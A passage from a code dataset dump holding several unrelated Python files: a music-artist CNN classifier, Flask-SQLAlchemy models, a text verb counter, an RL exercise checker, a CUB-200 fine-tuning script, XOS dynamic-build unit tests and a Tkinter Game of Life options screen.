بصير\nWildcards:\t*نبي*\nFields:\tسورة:يس\nIntervals:\tرقم_السورة:[1 الى 5]\nPartial vocalization:\tآية_:'المَلكُ'\nWord properties:\t{قول،اسم}\nDerivations: >ملك\nBuckwalter Transliteration: qawol\n \"\"\",\n ],\n 'code': [\n \"Have you considered looking at our code on https://github.com/assem-ch/quran-messenger-bot\",\n ],\n}","sub_path":"bot/logic_constants.py","file_name":"logic_constants.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"507077229","text":"\"\"\" Nicholas Molica and Joshua Kwok\nAudio processing methodology inspired by Leland Roberts' genre classification project, which can be read about here:\nhttps://towardsdatascience.com/musical-genre-classification-with-convolutional-neural-networks-ff04f9601a74\n\"\"\"\n\nimport os\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nfrom numpy import asarray\nfrom numpy import delete\nfrom tensorflow import keras\nfrom tensorflow.python.keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D, AveragePooling2D\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.python.keras.layers.pooling import AveragePooling2D\n\n# get train/test data folders from user and verify that they are indeed folders\nprint(\"Source folder for training data:\")\ntrain_src = input()\nprint(\"Source folder for test data:\")\ntest_src = input()\nif not os.path.isdir(train_src) or not os.path.isdir(test_src):\n print(\"Invalid source folder(s).\")\n exit(1)\n\n# a mapping of artist names to numerical labels\nlabel_dict = {\n 'chetbaker': 0,\n 'billevans': 1,\n 'johncoltrane': 2,\n 
'mccoytyner': 3,\n 'bach': 4,\n 'mumfordandsons': 5,\n 'gregoryalanisakov': 6,\n 'mandolinorange': 7,\n 'thesteeldrivers': 8,\n 'bts': 9,\n 'chopin': 10,\n 'mamamoo': 11,\n 'mozart': 12,\n 'seventeen': 13,\n 'tchaikovsky': 14\n}\n\n# given a file name from the data, return the name of the artist (requires that filenames be formatted correctly)\ndef get_text_label(file_name):\n segment_and_artist = file_name.split(\"_\")[0]\n if segment_and_artist[1:] in label_dict:\n artist = segment_and_artist[1:]\n elif segment_and_artist[2:] in label_dict:\n artist = segment_and_artist[2:]\n elif segment_and_artist[3:] in label_dict:\n artist = segment_and_artist[3:]\n else:\n print(\"Invalid file name scheme.\")\n exit(1)\n\n return artist\n\n# collect training data and corresponding labels\ntrain_data = {'data': [], 'label': []}\nfor file in os.listdir(train_src):\n if file[-4:] != '.png':\n continue\n img = Image.open(train_src + \"/\" + file)\n label = get_text_label(file)\n arr = asarray(img)\n arr = delete(arr, 1, 2)\n train_data['data'].append(arr)\n train_data['label'].append(label)\n\n# collect testing data and corresponding labels\ntest_data = {'data': [], 'label': []}\nfor file in os.listdir(test_src):\n if file[-4:] != '.png':\n continue\n img = Image.open(test_src + \"/\" + file)\n label = get_text_label(file)\n arr = asarray(img)\n arr = delete(arr, 1, 2)\n test_data['data'].append(arr)\n test_data['label'].append(label)\n\n# cast everything to numpy arrays to prep for training\nfeatures_train = asarray(train_data['data'])\nlabels_train = asarray(list(map(lambda x: label_dict[x], train_data['label'])))\nfeatures_test = asarray(test_data['data'])\nlabels_test = asarray(list(map(lambda x: label_dict[x], test_data['label'])))\n\n# normalize data to be between 0 and 1 and convert to binary class matrix\nfeatures_train = features_train.astype('float32') / 255\nfeatures_test = features_test.astype('float32') / 255\nlabels_train = keras.utils.to_categorical(labels_train, 15)\nlabels_test = keras.utils.to_categorical(labels_test, 15)\n\n\"\"\"\nThe CNN code below was originally adapted from Leland Roberts' genre classification project.\nTheir full project is available on their Github (github.com/lelandroberts97), but the specific code we adapted is available here:\nhttps://github.com/lelandroberts97/Musical_Genre_Classification/blob/master/code/04_CNN.ipynb\n\"\"\"\n\n# initialize the model as a Sequential neural network\ncnn_model = keras.Sequential(name='cnn')\n\n# add the first convolutional layer and corresponding max pooling layer\ncnn_model.add(Conv2D(filters=16,\n kernel_size=(3,3),\n activation='relu',\n input_shape=(54,773,1)))\ncnn_model.add(MaxPooling2D(pool_size=(2,4)))\n\n# add a second convolutional layer and an average pooling layer\ncnn_model.add(Conv2D(filters=32,\n kernel_size=(3,3),\n activation='relu'))\ncnn_model.add(AveragePooling2D(pool_size=(2,4)))\n\n# add a flattening layer to flatten convolutions before passing through neurons\ncnn_model.add(Flatten())\n\n# add a densely connected hidden layer of 64 neurons (w/ relu activation functions)\ncnn_model.add(Dense(64, activation='relu'))\n\n# add a dropout layer to help combat overfitting\ncnn_model.add(Dropout(0.25))\n\n# add a densely connected output layer (w/ softmax activation functions)\ncnn_model.add(Dense(15, activation='softmax'))\n\n# compile the network\ncnn_model.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\n# fit the network to the data, validate at each step to show 
testing accuracy after each epoch\nhistory = cnn_model.fit(features_train,\n                        labels_train, \n                        batch_size=32,\n                        validation_data=(features_test, labels_test),\n                        epochs=40)\n\n# collect the training/testing accuracy and plot it (Keras logs these under 'accuracy'/'val_accuracy')\ntrain_accuracy = history.history['accuracy']\ntest_accuracy = history.history['val_accuracy']\nplt.figure(figsize = (16,8))\nplt.plot(train_accuracy, label='Training Accuracy', color='blue')\nplt.plot(test_accuracy, label='Testing Accuracy', color='red')\nplt.title('Training and Testing Accuracy by Epoch', fontsize = 25)\nplt.xlabel('Epoch', fontsize = 18)\nplt.ylabel('Accuracy', fontsize = 18)\nplt.xticks(range(1,40), range(1,40))\nplt.savefig(\"results.png\", bbox_inches='tight', pad_inches=0.2)\nplt.close()\n\n# evaluate the final test accuracy and print it\nscore = cnn_model.evaluate(features_test, labels_test)\nprint(\"Test accuracy: \", score[1])","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"251613301","text":"import os\nfrom sqlalchemy import Column, Integer, Float, DateTime, String, ForeignKey, create_engine\nfrom flask_sqlalchemy import SQLAlchemy\nfrom datetime import datetime\nimport sys\nimport json\n\n\ndatabase_path = os.environ['DATABASE_URL']\n\ndb = SQLAlchemy()\n\n\ndef setup_db(app, database_path=database_path):\n    app.config['SQLALCHEMY_DATABASE_URI'] = database_path\n    app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n    db.app = app\n    db.init_app(app)\n    db.create_all()\n\n\nclass Project(db.Model):\n    __tablename__ = 'project'\n    id = Column(Integer, primary_key=True)\n    name = Column(String, nullable=False)\n    kind = Column(String, nullable=True)\n    deadline = Column(DateTime, default=datetime.utcnow, nullable=True)\n    word_count = Column(Integer, default=0, nullable=True)\n    hour_count = Column(Float, default=0.0, nullable=True)\n    rate = Column(Float, default=0.0, nullable=True)\n    person_id = Column(Integer, ForeignKey('person.id'), nullable=False)\n    service_id = Column(Integer, ForeignKey('service.id'), nullable=False)\n    person_child = db.relationship(\"Person\", back_populates='services')\n    service_child = db.relationship(\"Service\", back_populates='people')\n\n    def insert(self):\n        try:\n            db.session.add(self)\n            db.session.commit()\n        except:\n            db.session.rollback()\n            print(sys.exc_info())\n\n    def update(self):\n        try:\n            db.session.commit()\n        except:\n            db.session.rollback()\n            print(sys.exc_info())\n\n    def delete(self):\n        try:\n            db.session.delete(self)\n            db.session.commit()\n        except:\n            db.session.rollback()\n            print(sys.exc_info())\n\n    def format(self):\n        return{\n            'id': self.id,\n            'name': self.name,\n            'kind': self.kind,\n            'deadline': self.deadline,\n            'word_count': self.word_count,\n            'hour_count': self.hour_count,\n            'rate': self.rate,\n            'person_id': self.person_id,\n            'service_id': self.service_id\n        }\n\n\nclass Person(db.Model):\n    __tablename__ = 'person'\n\n    id = Column(Integer, primary_key=True)\n    name = Column(String, nullable=False)\n    kind = Column(String, nullable=True)\n    email = Column(String, nullable=True)\n    ratew = Column(Float, default=0.0, nullable=True)\n    rateh = Column(Float, default=0.0, nullable=True)\n    services = db.relationship(\"Project\", back_populates=\"person_child\")\n\n    def insert(self):\n        try:\n            db.session.add(self)\n            db.session.commit()\n        except:\n            db.session.rollback()\n            print(sys.exc_info())\n\n    def update(self):\n        try:\n            db.session.commit()\n        except:\n            
db.session.rollback()\n print(sys.exc_info())\n\n def delete(self):\n try:\n db.session.delete(self)\n db.session.commit()\n except:\n db.session.rollback()\n print(sys.exc_info())\n\n def format(self):\n return{\n 'id': self.id,\n 'name': self.name,\n 'kind': self.kind,\n 'email': self.email,\n 'ratew': self.ratew,\n 'rateh': self.rateh\n }\n\n\nclass Service(db.Model):\n __tablename__ = 'service'\n\n id = Column(Integer, primary_key=True)\n name = Column(String, nullable=False)\n source = Column(String, nullable=False)\n destiny = Column(String, nullable=False)\n people = db.relationship(\"Project\", back_populates=\"service_child\")\n\n def insert(self):\n try:\n db.session.add(self)\n db.session.commit()\n except:\n db.session.rollback()\n print(sys.exc_info())\n\n def update(self):\n try:\n db.session.commit()\n except:\n db.session.rollback()\n print(sys.exc_info())\n\n def delete(self):\n try:\n db.session.delete(self)\n db.session.commit()\n except:\n db.session.rollback()\n print(sys.exc_info())\n\n def format(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'source': self.source,\n 'destiny': self.destiny\n }\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"280106928","text":"__author__ = 'Filipe P. Spindola'\n\nimport requests\n\nclass Questao2:\n def __init__(self):\n self.foo = ['t', 's', 'w', 'l', 'h']\n self.raw_text1 = 'https://raw.github.com/I-Value/ExameIValue/master/textoA.txt'\n self.raw_text2 = 'https://raw.github.com/I-Value/ExameIValue/master/textoB.txt'\n\n def process_text_1(self, text):\n\n verbs = []\n first_person_verbs = []\n text1 = requests.get(text).content.decode().split()\n\n for word in text1:\n if len(word) >= 8 and word[-1:] in self.foo:\n verbs.append(word)\n if word[:1] in self.foo:\n first_person_verbs.append(word)\n return len(verbs), len(first_person_verbs)\n\n def process_text_2(self, text):\n\n verbs = []\n first_person_verbs = []\n text2 = requests.get(text).content.decode().split()\n\n for word in text2:\n if len(word) >= 8 and word[-1:] in self.foo:\n verbs.append(word)\n if word[:1] in self.foo:\n first_person_verbs.append(word)\n return len(verbs), len(first_person_verbs)\n\n\nif __name__ == '__main__':\n cl = Questao2()\n ret_text_1 = cl.process_text_1(cl.raw_text1)\n ret_text_2 = cl.process_text_2(cl.raw_text2)\n print('The first text has {0} verbs and {1} first person verbs'.format(ret_text_1[0], ret_text_1[1]))\n print('The second text has {0} verbs and {1} first person verbs'.format(ret_text_2[0], ret_text_2[1]))\n\n\n\n\n\n\n\n","sub_path":"Questao2.py","file_name":"Questao2.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"135646606","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 11 09:27:16 2018\n\n@author: mlopes\n\"\"\"\n\nimport numpy as np\nimport RL\n\nprint(\"exercicio 1\")\n#exercise 1\n## Env 1\nPl = np.zeros((7,2,7))\nPl[0,0,1]=1\nPl[1,0,2]=1\nPl[2,0,3]=1\nPl[3,0,4]=1\nPl[4,0,5]=1\nPl[5,0,6]=0.9\nPl[5,0,5]=0.1\nPl[6,0,6]=1\nPl[0,1,0]=1\nPl[1,1,1]=0\nPl[1,1,0]=1\nPl[2,1,1]=1\nPl[3,1,2]=1\nPl[4,1,3]=1\nPl[5,1,4]=1\nPl[6,1,5]=1\n\nRl = np.zeros((7,2))\nRl[[0,6],:]=1\nabsorv = np.zeros((7,1))\nabsorv[[0,6]]=1\nfmdp = RL.finiteMDP(7,2,0.9,Pl,Rl,absorv)\n\nJ,traj = fmdp.runPolicy(500,3,poltype = \"exploration\")\ndata = np.load(\"Q1.npz\")\nQr = 
fmdp.traces2Q(traj)\nresult = np.sqrt(sum(sum((data['Q1']-Qr)**2)))\nif result < 1:\n\tprint(\"Aproximação de Q dentro do previsto. OK\\n\")\nelse:\n\tprint(\"Aproximação de Q fora do previsto. FAILED\\n\")\n\nJ,traj = fmdp.runPolicy(3,3,poltype = \"exploitation\", polpar = Qr)\nresult = np.sqrt(sum(sum((data['traj2']-traj)**2)))\nif result < 1:\n\tprint(\"Trajectória óptima. OK\\n\")\nelse:\n\tprint(\"Trajectória não óptima. FAILED\\n\")\n\n#exercise 2\nprint(\"exercicio 2\")\ndata = np.load(\"traj.npz\")\nfmdp = RL.finiteMDP(8,4,0.9)\nq2 = fmdp.traces2Q(data['traj'])\n\nresult = np.sqrt(sum(sum((data['Q']-q2)**2)))\nif result < 1:\n\tprint(\"Aproximação de Q dentro do previsto. OK\\n\")\nelse:\n\tprint(\"Aproximação de Q fora do previsto. FAILED\\n\")\n","sub_path":"proj/2018-2019/part2/src/mainRL.py","file_name":"mainRL.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"137397306","text":"from __future__ import print_function\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport torch.backends.cudnn as cudnn\n\nimport torchvision\nimport torchvision.transforms as transforms\n\nimport os\nimport argparse\nimport json\nimport numpy as np  # needed below for np.array; the star import may not provide it\n\nfrom models import *\nfrom torch.autograd import Variable\nimport SC_Loss\nimport RankingLoss\nimport visdom\nfrom utils2 import FineTuneModel\n\nparser = argparse.ArgumentParser(description='PyTorch CIFAR10 Training')\nparser.add_argument('--lr', default=0.01, type=float, help='learning rate')\nparser.add_argument('--resume', '-r', action='store_true', help='resume from checkpoint')\nargs = parser.parse_args()\n\nuse_cuda = torch.cuda.is_available()\nbest_acc = 0  # best test accuracy\nstart_epoch = 0  # start from epoch 0 or last checkpoint epoch\n\n# Data\nprint('==> Preparing data..')\ntransform_train = transforms.Compose([\n    transforms.Resize(256),\n    transforms.RandomCrop(224),\n    transforms.RandomHorizontalFlip(),\n    transforms.ToTensor(),\n    transforms.Normalize((0.4805, 0.456, 0.4063), (0.229, 0.224, 0.225)),\n])\n\ntransform_test = transforms.Compose([\n    transforms.ToTensor(),\n    transforms.Normalize((0.4805, 0.456, 0.4063), (0.2675, 0.224, 0.225)),\n])\n# trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform_train)\ntrainset = torchvision.datasets.ImageFolder(root='/root/mounted_device/tong/dataset/CUB_200_2011/train',\n                                            transform=transform_train)\ntrainloader = torch.utils.data.DataLoader(trainset, batch_size=96, shuffle=True, num_workers=16)\n\n# testset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=transform_test)\ntestset = torchvision.datasets.ImageFolder(root='/root/mounted_device/tong/dataset/CUB_200_2011/val',\n                                           transform=transform_train)\ntestloader = torch.utils.data.DataLoader(testset, batch_size=96, shuffle=False, num_workers=16)\n\n# Model\nprint('==> Building model..')\nnet = torchvision.models.resnet50(pretrained=True)\n# net_features = nn.Sequential(*list(net.children())[:-1])\n# for p in net_features.parameters():\n#     p.requires_grad = False\n# net_classifier = nn.Sequential(nn.Linear(2048, 200))\nnet = FineTuneModel(net, 200)\noptimizer = optim.SGD(filter(lambda p: p.requires_grad, net.parameters()), lr=args.lr, momentum=0.9, weight_decay=1e-4)\n# net = VGG('VGG19')\n# net = torch.load('resnet18-5c106cde.pth')\n# net = ResNet18()\n# net = PreActResNet18()\n# net = GoogLeNet()\n# net = DenseNet121()\n# net = 
ResNeXt29_2x64d()\n# net = MobileNet()\n# net = DPN92()\n# net = ShuffleNetG2()\n# net = SENet18()\n# net = LeNet()\n# net = ResNet152()\n# net = Wide_ResNet(depth=28, widen_factor=10, dropout_rate=0.3, num_classes=100)\n# net = CifarResNeXt(cardinality=8, depth=29, nlabels=100, base_width=64, widen_factor=4)\nif use_cuda:\n net.cuda()\n net = torch.nn.DataParallel(net, device_ids=range(torch.cuda.device_count()))\n # net_features = torch.nn.DataParallel(net_features, device_ids=range(torch.cuda.device_count()))\n # net_classifier = torch.nn.DataParallel(net_classifier, device_ids=range(torch.cuda.device_count()))\n cudnn.benchmark = True\n\n\nif args.resume:\n # Load checkpoint.\n print('==> Resuming from checkpoint..')\n assert os.path.isdir('checkpoint'), 'Error: no checkpoint directory found!'\n checkpoint = torch.load('./checkpoint/ckpt.t7')\n net.load_state_dict(checkpoint['net'])\n best_acc = checkpoint['acc']\n start_epoch = checkpoint['epoch']\n optimizer.load_state_dict(checkpoint['optimizer'])\n\nwith open('target_list.json', 'r') as f:\n target_list = json.load(f)\n# target_list = {'airplane', 'automobile', 'bird', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'}\ncriterion = SC_Loss.SC_Loss(target_list).cuda()\n# distance_matrix = criterion.distance_matrix\n# reco_acc = InclusiveLoss.RankingCorrelation(distance_matrix)\n# criterion = nn.CrossEntropyLoss().cuda()\nscheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=30, gamma=0.1)\n\n\n# Training\ndef train(epoch):\n print('\\nEpoch: %d' % epoch)\n net.train()\n train_loss = 0\n correct = 0\n total = 0\n for batch_idx, (inputs, targets) in enumerate(trainloader):\n if use_cuda:\n inputs, targets = inputs.cuda(), targets.cuda()\n optimizer.zero_grad()\n inputs, targets = Variable(inputs), Variable(targets)\n # features = net_features(inputs)\n # features = features.view(features.size(0), -1)\n # # c_c.record(features, targets)\n # outputs = net_classifier(features)\n outputs = net(inputs)\n # loss = criterion(outputs, targets, c_c)\n if epoch == 5:\n print('!')\n loss = criterion(outputs, targets)\n loss.backward()\n optimizer.step()\n\n train_loss += loss.data[0]\n _, predicted = torch.max(outputs.data, 1)\n total += targets.size(0)\n correct += predicted.eq(targets.data).cpu().sum()\n # reco_acc.update(outputs, targets)\n # print(reco_acc.output())\n # r_a = reco_acc.output()\n # reco_acc.re_init()\n # c_c.update()\n print(epoch, len(trainloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'\n % (train_loss, 100. * correct / total, correct, total))\n return 100. * correct / total\n # return r_a\n\n\ndef test(epoch):\n global best_acc\n net.eval()\n test_loss = 0\n correct = 0\n total = 0\n for batch_idx, (inputs, targets) in enumerate(testloader):\n if use_cuda:\n inputs, targets = inputs.cuda(), targets.cuda()\n inputs, targets = Variable(inputs, volatile=True), Variable(targets)\n # features = net_features(inputs)\n # features = features.view(features.size(0), -1)\n # outputs = net_classifier(features)\n # loss = criterion(outputs, targets, c_c)\n outputs = net(inputs)\n loss = criterion(outputs, targets)\n test_loss += loss.data[0]\n _, predicted = torch.max(outputs.data, 1)\n total += targets.size(0)\n correct += predicted.eq(targets.data).cpu().sum()\n # reco_acc.update(outputs, targets)\n # print(reco_acc.output())\n # r_a = reco_acc.output()\n # reco_acc.re_init()\n\n print(epoch, len(testloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'\n % (test_loss, 100. 
* correct / total, correct, total))\n\n # Save checkpoint.\n acc = 100. * correct / total\n if acc > best_acc:\n print('Saving..')\n state = {\n 'net': net.state_dict(),\n 'acc': acc,\n 'epoch': epoch,\n 'optimizer': optimizer.state_dict()\n }\n if not os.path.isdir('checkpoint'):\n os.mkdir('checkpoint')\n torch.save(state, './checkpoint/ckpt.t7')\n best_acc = acc\n return acc\n # return r_a\n\n\nvis = visdom.Visdom()\nwin = vis.line(X=np.array([0]), Y=np.array([[0, 0]]),\n opts={'legend': ['train', 'test'], 'xlabel': 'epoch', 'ylabel': 'acc'})\n# c_c = InclusiveLoss.ClusterCenters(200, 2048)\n\nfor epoch in range(start_epoch, start_epoch + 300):\n scheduler.step()\n print(optimizer.param_groups[0]['lr'])\n train_r_a = train(epoch)\n test_r_a = test(epoch)\n vis.line(X=np.array([epoch]), Y=np.array([[train_r_a, test_r_a]]),\n opts={'legend': ['train', 'test'], 'xlabel': 'epoch', 'ylabel': 'acc'}, update='append', win=win)\n","sub_path":"CUB_200_2011.py","file_name":"CUB_200_2011.py","file_ext":"py","file_size_in_byte":7422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"22052581","text":"\n# Copyright 2017-present Open Networking Foundation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nimport os\nimport shutil\nimport sys\nimport tempfile\nimport unittest\nfrom mock import patch\n\nfrom xosconfig import Config\n\nclass DynamicLoadItem():\n def __init__(self, **kwargs):\n for (k,v) in kwargs.items():\n setattr(self, k, v)\n\nclass DynamicLoadRequest():\n def __init__(self, **kwargs):\n self.xprotos = []\n self.decls = []\n self.attics = []\n for (k,v) in kwargs.items():\n setattr(self, k, v)\n\nclass DynamicUnloadRequest():\n def __init__(self, **kwargs):\n for (k,v) in kwargs.items():\n setattr(self, k, v)\n\nclass TestDynamicBuild(unittest.TestCase):\n def setUp(self):\n global dynamicbuild\n\n config = basic_conf = os.path.abspath(os.path.dirname(os.path.realpath(__file__)) + \"/test_config.yaml\")\n Config.clear() # in case left unclean by a previous test case\n Config.init(config)\n\n import dynamicbuild\n\n self.base_dir = tempfile.mkdtemp()\n self.example_xproto = \"\"\"option app_label = \"exampleservice\";\noption name = \"exampleservice\";\n\nmessage ExampleService (Service){\n option verbose_name = \"Example Service\";\n required string service_message = 1 [help_text = \"Service Message to Display\", max_length = 254, null = False, db_index = False, blank = False];\n}\n\nmessage Color (XOSBase){\n option verbose_name = \"Color\";\n required string name = 1 [help_text = \"Name for this color\", db_index = False, max_length = 256, null = False, blank = False];\n required string html_code = 2 [help_text = \"Code for this color\", db_index = False, max_length = 256, null = False, blank = False];\n}\n\nmessage ExampleServiceInstance (TenantWithContainer){\n option verbose_name = \"Example Service Instance\";\n required string tenant_message = 1 [help_text = \"Tenant Message to Display\", max_length = 254, null 
= False, db_index = False, blank = False];\n optional manytoone foreground_color->Color:serviceinstance_foreground_colors = 3 [db_index = True, null = True, blank = True];\n optional manytoone background_color->Color:serviceinstance_background_colors = 3 [db_index = True, null = True, blank = True];\n}\n\nmessage EmbeddedImage (XOSBase){\n option verbose_name = \"Embedded Image\";\n required string name = 1 [help_text = \"Name for this image\", db_index = False, max_length = 256, null = False, blank = False];\n required string url = 2 [help_text = \"URL for this image\", db_index = False, max_length = 256, null = False, blank = False];\n optional manytoone serviceinstance->ExampleServiceInstance:embedded_images = 3 [db_index = True, null = True, blank = True];\n}\n \"\"\"\n\n self.example_xproto_item = DynamicLoadItem(filename = \"exampleservice.xproto\",\n contents = self.example_xproto)\n\n self.example_request = DynamicLoadRequest(name = \"exampleservice\",\n version = \"1\",\n xprotos = [self.example_xproto_item])\n\n self.example_unload_request = DynamicUnloadRequest(name = \"exampleservice\",\n version = \"1\")\n\n self.builder = dynamicbuild.DynamicBuilder(base_dir = self.base_dir)\n\n def tearDown(self):\n if os.path.abspath(self.base_dir).startswith(\"/tmp\"): # be paranoid about recursive deletes\n shutil.rmtree(self.base_dir)\n\n def test_pre_validate_file(self):\n self.builder.pre_validate_file(self.example_xproto_item)\n\n def test_pre_validate_models(self):\n self.builder.pre_validate_models(self.example_request)\n\n def test_generate_request_hash(self):\n hash = self.builder.generate_request_hash(self.example_request, state=\"load\")\n self.assertEqual(hash, \"162de5012a8399883344085cbc232a2e627c5091\")\n\n def test_handle_loadmodels_request(self):\n with patch.object(dynamicbuild.DynamicBuilder, \"save_models\", wraps=self.builder.save_models) as save_models, \\\n patch.object(dynamicbuild.DynamicBuilder, \"run_xosgenx_service\", wraps=self.builder.run_xosgenx_service) as run_xosgenx_service, \\\n patch.object(dynamicbuild.DynamicBuilder, \"remove_service\", wraps=self.builder.remove_service) as remove_service:\n result = self.builder.handle_loadmodels_request(self.example_request)\n\n save_models.assert_called()\n run_xosgenx_service.assert_called()\n remove_service.assert_not_called()\n\n self.assertEqual(result, self.builder.SOMETHING_CHANGED)\n\n self.assertTrue(os.path.exists(self.builder.manifest_dir))\n self.assertTrue(os.path.exists(os.path.join(self.builder.manifest_dir, \"exampleservice.json\")))\n\n service_dir = os.path.join(self.base_dir, \"services\", \"exampleservice\")\n\n self.assertTrue(os.path.exists(service_dir))\n self.assertTrue(os.path.exists(os.path.join(service_dir, \"__init__.py\")))\n self.assertTrue(os.path.exists(os.path.join(service_dir, \"models.py\")))\n self.assertTrue(os.path.exists(os.path.join(service_dir, \"security.py\")))\n\n manifest = json.loads(open(os.path.join(self.builder.manifest_dir, \"exampleservice.json\"), \"r\").read())\n self.assertEqual(manifest.get(\"state\"), \"load\")\n\n def test_handle_unloadmodels_request(self):\n with patch.object(dynamicbuild.DynamicBuilder, \"save_models\", wraps=self.builder.save_models) as save_models, \\\n patch.object(dynamicbuild.DynamicBuilder, \"run_xosgenx_service\", wraps=self.builder.run_xosgenx_service) as run_xosgenx_service, \\\n patch.object(dynamicbuild.DynamicBuilder, \"remove_service\", wraps=self.builder.remove_service) as remove_service:\n result = 
self.builder.handle_unloadmodels_request(self.example_unload_request)\n\n save_models.assert_called()\n run_xosgenx_service.assert_not_called()\n remove_service.assert_called()\n\n self.assertEqual(result, self.builder.SOMETHING_CHANGED)\n\n self.assertTrue(os.path.exists(self.builder.manifest_dir))\n self.assertTrue(os.path.exists(os.path.join(self.builder.manifest_dir, \"exampleservice.json\")))\n\n manifest = json.loads(open(os.path.join(self.builder.manifest_dir, \"exampleservice.json\"), \"r\").read())\n self.assertEqual(manifest.get(\"state\"), \"unload\")\n\n def test_handle_loadmodels_request_twice(self):\n result = self.builder.handle_loadmodels_request(self.example_request)\n self.assertEqual(result, self.builder.SOMETHING_CHANGED)\n\n result = self.builder.handle_loadmodels_request(self.example_request)\n self.assertEqual(result, self.builder.NOTHING_TO_DO)\n\n def test_save_models(self):\n manifest = self.builder.save_models(self.example_request, state=\"load\")\n\n dynamic_dir = os.path.join(self.base_dir, \"dynamic_services\", \"exampleservice\")\n service_dir = os.path.join(self.base_dir, \"services\", \"exampleservice\")\n\n self.assertEqual(manifest[\"name\"], self.example_request.name)\n self.assertEqual(manifest[\"version\"], self.example_request.version)\n self.assertEqual(manifest[\"hash\"], \"162de5012a8399883344085cbc232a2e627c5091\")\n self.assertEqual(manifest[\"dir\"], dynamic_dir)\n self.assertEqual(manifest[\"dest_dir\"], service_dir)\n self.assertEqual(len(manifest[\"xprotos\"]), 1)\n\n def test_save_models_precomputed_hash(self):\n manifest = self.builder.save_models(self.example_request, state=\"load\", hash=\"1234\")\n\n dynamic_dir = os.path.join(self.base_dir, \"dynamic_services\", \"exampleservice\")\n service_dir = os.path.join(self.base_dir, \"services\", \"exampleservice\")\n\n self.assertEqual(manifest[\"name\"], self.example_request.name)\n self.assertEqual(manifest[\"version\"], self.example_request.version)\n self.assertEqual(manifest[\"hash\"], \"1234\")\n self.assertEqual(manifest[\"dir\"], dynamic_dir)\n self.assertEqual(manifest[\"dest_dir\"], service_dir)\n self.assertEqual(len(manifest[\"xprotos\"]), 1)\n\ndef main():\n unittest.main()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"xos/coreapi/test_dynamicbuild.py","file_name":"test_dynamicbuild.py","file_ext":"py","file_size_in_byte":8789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"12716588","text":"# Basic Animation Framework\r\n\r\n#File by jcheng3\r\n#Options page or Game Of Life\r\n# Basic Animation Framework\r\n\r\n#File by jcheng3\r\n#Seed stage for 3D Game Of Life\r\n\r\nfrom Tkinter import *\r\n\r\nimport copy\r\n\r\n####################################\r\n# customize these functions\r\n####################################\r\n\r\ninSeeds = []\r\n\r\ndef init(data):\r\n data.liveOption = 2\r\n data.spawnOption = 3\r\n data.gridSize = 5\r\n data.itrDelay = 250\r\n data.box1X = 345\r\n data.box1Y = 212\r\n data.box2X = 365\r\n data.box2Y = 241\r\n data.box3X = 220\r\n data.box3Y = 265\r\n data.box4X = 335\r\n data.box4Y = 290\r\n data.boxSize = 25\r\n data.highlight = 0\r\n data.infoFont = (\"Consolas\", 10)\r\n data.titleFont = (\"Helvetica\", 20)\r\n data.fin = False\r\n data.error = False\r\n pass\r\n\r\ndef mousePressed(event, data):\r\n print(event.x, event.y)\r\n if event.x >= data.box1X and event.y >= data.box1Y and \\\r\n event.x <= data.box1X + data.boxSize and \\\r\n event.y <= data.box1Y + data.boxSize:\r\n 
data.highlight = 1\r\n    elif event.x >= data.box2X and event.y >= data.box2Y and \\\r\n        event.x <= data.box2X + data.boxSize and \\\r\n        event.y <= data.box2Y + data.boxSize:\r\n        data.highlight = 2\r\n    elif event.x >= data.box3X and event.y >= data.box3Y and \\\r\n        event.x <= data.box3X + data.boxSize and \\\r\n        event.y <= data.box3Y + data.boxSize:\r\n        data.highlight = 3\r\n    elif event.x >= data.box4X and event.y >= data.box4Y and \\\r\n        event.x <= data.box4X + data.boxSize and \\\r\n        event.y <= data.box4Y + data.boxSize:\r\n        data.highlight = 4\r\n    else: data.highlight = 0\r\n\r\n\r\ndef keyPressed(event, data):\r\n    if data.highlight == 1:\r\n        if event.keysym == \"BackSpace\":\r\n            data.liveOption = data.liveOption // 10\r\n        else:\r\n            try:\r\n                data.liveOption = (data.liveOption*10) + int(event.keysym)\r\n                data.error = False\r\n            except:\r\n                data.error = True\r\n    elif data.highlight == 2:\r\n        if event.keysym == \"BackSpace\":\r\n            data.spawnOption = data.spawnOption // 10\r\n        else:\r\n            try:\r\n                data.spawnOption = (data.spawnOption*10) + 